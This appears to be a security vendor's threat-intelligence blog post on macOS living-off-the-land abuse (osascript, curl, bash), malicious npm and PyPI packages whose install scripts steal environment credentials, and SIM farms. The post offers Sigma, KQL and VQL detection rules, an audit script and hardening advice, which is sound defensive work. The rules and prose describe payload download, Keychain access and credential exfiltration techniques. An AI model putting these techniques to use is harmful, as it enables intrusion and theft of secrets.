Back to Intelligence

macOS LotL Abuse & Supply Chain Compromise: ThreatsDay Defense Guide

SA
Security Arsenal Team
April 25, 2026
6 min read

The ThreatsDay Bulletin this week paints a stark picture of the modern threat landscape: a $290M DeFi heist, rampant abuse of macOS Living-off-the-Land (LotL) binaries, and the disruption of ProxySmart SIM farms. However, the most alarming takeaway for defenders is the persistence of "same bugs, same mistakes." Attackers continue to find success not by innovating new exploitation techniques, but by abusing trust—specifically within the software supply chain and legitimate system tools.

Defenders can no longer treat every binary included with an OS as benign, nor can they assume that third-party packages in their CI/CD pipelines are safe. We are seeing active supply chain compromises where unchecked packages steal data and establish unauthorized access mechanisms. This intelligence requires immediate action to hunt for LotL abuse and audit software dependencies.

Technical Analysis

1. macOS Living-off-the-Land (LotL) Abuse

Attackers are increasingly leveraging trusted, pre-installed macOS binaries to bypass application allow-listing and evade detection. Rather than dropping custom malware, adversaries utilize tools like osascript (Open Scripting Architecture), curl, and bash to execute payloads.

  • Affected Platform: macOS (Ventura, Sonoma, Sequoia).
  • Attack Vector: LotL Binaries (specifically OSA scripts).
  • Mechanism: Adversaries use osascript to execute AppleScript or JavaScript for Automation (JXA) to download second-stage payloads or interact with the system (e.g., accessing the Keychain).
  • Exploitation Status: Confirmed active exploitation in the wild. Not a vulnerability in the traditional sense (CVE), but an abuse of functionality.

2. Supply Chain Compromise via Malicious Packages

The bulletin highlights that "packages you did not check are stealing data." This refers to the ongoing trend of typosquatting and dependency confusion attacks in package repositories (npm, PyPI, RubyGems).

  • Affected Products: Software utilizing public package managers.
  • Attack Vector: Malicious packages containing obfuscated code (e.g., base64 encoded strings) that execute upon installation.
  • Mechanism: post-install scripts or obfuscated code within the package that exfiltrates environment variables (API keys, AWS credentials) to attacker-controlled C2 servers.
  • Exploitation Status: Theoretical to active; widely observed in automated scanning and manual IR engagements.

3. ProxySmart SIM Farms

While primarily a telephony fraud vector, the disruption of SIM farms indicates a shift in how attackers scale operations. These farms are often used to bypass 2FA (SMS-based) or mass-send phishing messages. In an enterprise context, this correlates with an increase in SMS-based phishing (smishing) targeting employees.

  • Affected Infrastructure: Telephony providers, MSPs.
  • Risk: Bypassing MFA, widespread credential harvesting.

Detection & Response

The following detection rules focus on the macOS LotL abuse and the Supply Chain compromises, as these present the highest risk for direct system compromise and data exfiltration.

SIGMA Rules

YAML
---
title: macOS LotL - Suspicious osascript Network Connection
id: 8c5d4a2e-1b3c-4d6e-9f8a-1b2c3d4e5f6a
status: experimental
description: Detects osascript making outbound network connections, a common LotL technique to download payloads or exfiltrate data.
references:
  - https://attack.mitre.org/techniques/T1059/002/
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.execution
  - attack.t1059.002
logsource:
  category: network_connection
  product: macos
detection:
  selection:
    Image|endswith: '/osascript'
  condition: selection
falsepositives:
  - Legitimate developer automation scripts
level: high
---
title: Supply Chain - Package Manager Spawning Shell
id: 9d6e5f3b-2c4d-5e7f-0a1b-2c3d4e5f6a7b
status: experimental
description: Detects package managers (npm, pip, cargo) spawning shell processes (bash, sh), indicative of malicious post-install scripts.
references:
  - https://attack.mitre.org/techniques/T1195/
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.initial_access
  - attack.supply_chain
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    ParentProcess|contains:
      - 'npm'
      - 'pip'
      - 'python'
      - 'cargo'
      - 'gem'
    Image|endswith:
      - '/bash'
      - '/sh'
      - '/zsh'
  condition: selection
falsepositives:
  - Legitimate build scripts with known behavior
level: medium

KQL (Microsoft Sentinel / Defender)

KQL — Microsoft Sentinel / Defender
// Hunt for suspicious macOS LotL behavior
DeviceProcessEvents
| where Timestamp > ago(7d)
| where OSPlatform == "macOS"
| where ProcessVersionInfoOriginalFileName =~ "osascript" or FileName =~ "osascript"
| where ProcessCommandLine contains "http" or ProcessCommandLine contains "curl"
| project Timestamp, DeviceName, InitiatingProcessAccountName, ProcessCommandLine, ProcessVersionInfoOriginalFileName
| extend URL = extract("(https?://[^"]+)", 1, ProcessCommandLine)
| order by Timestamp desc

Velociraptor VQL

VQL — Velociraptor
-- Hunt for osascript execution with network connection logic
SELECT Pid, Name, Exe, CommandLine, Username
FROM pslist()
WHERE Name = 'osascript'
  AND (CommandLine =~ 'http' OR CommandLine =~ 'curl' OR CommandLine =~ 'do shell script')

-- Hunt for recently created/deleted package files indicative of supply chain compromise
SELECT FullPath, Size, Mtime, Mode, Username
FROM glob(globs='/*/node_modules/*/.git/config')
WHERE Mtime < now() - 24h

Remediation Script (Bash)

Bash / Shell
#!/bin/bash
# Remediation/Hardening: Audit for suspicious package installs
# Usage: sudo ./audit_supply_chain.sh

echo "[+] Auditing for recent npm/pip installations..."

# Check for recently modified node_modules directories (last 24 hours)
echo "[+] Checking for 'npm install' activity in the last 24 hours..."
find /home /root -name "node_modules" -type d -mtime -1 2>/dev/null

# Check for recently installed Python packages (pip)
echo "[+] Checking for recent pip activity..."
find /home /root -name "site-packages" -type d -mtime -1 2>/dev/null

# macOS Specific: Audit osascript usage logs (if available)
if [[ "$(uname)" == "Darwin" ]]; then
  echo "[+] macOS detected. Checking for osascript logs..."
  log show --predicate 'process == "osascript"' --last 1h --style compact 2>/dev/null | head -20
fi

echo "[+] Audit complete. Review findings manually."

Remediation

  1. Implement Software Bill of Materials (SBOM): You cannot protect what you cannot see. Generate SBOMs for all critical applications to identify unauthorized or transitive dependencies.
  2. Lock Down Package Managers: Enforce strict dependency pinning (package-lock., requirements.txt) and review changes in Pull Requests. Avoid using wildcard ranges in dependencies.
  3. Restrict LotL Binaries on macOS: Use MDM solutions (e.g., Jamf, Intune) to create Privacy Preferences Policy Control (PPPC) profiles that restrict osascript, bash, and curl from accessing sensitive folders (like ~/Documents, ~/Downloads) or accessing the network unless signed by a trusted developer certificate.
  4. Network Segmentation: Restrict build systems and CI/CD runners from accessing the public internet directly unless necessary. Force all traffic through an explicit proxy with SSL inspection to detect data exfiltration attempts.
  5. Developer Hygiene: mandate the use of Hardware Security Keys (FIDO2) for developers to mitigate the risk of account takeovers via SIM swapping attacks.

Related Resources

Security Arsenal Penetration Testing Services AlertMonitor Platform Book a SOC Assessment vulnerability-management Intel Hub

sigma-rulekql-detectionthreat-huntingdetection-engineeringsiem-detectionmacos-lotlsupply-chainproxy-smart

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action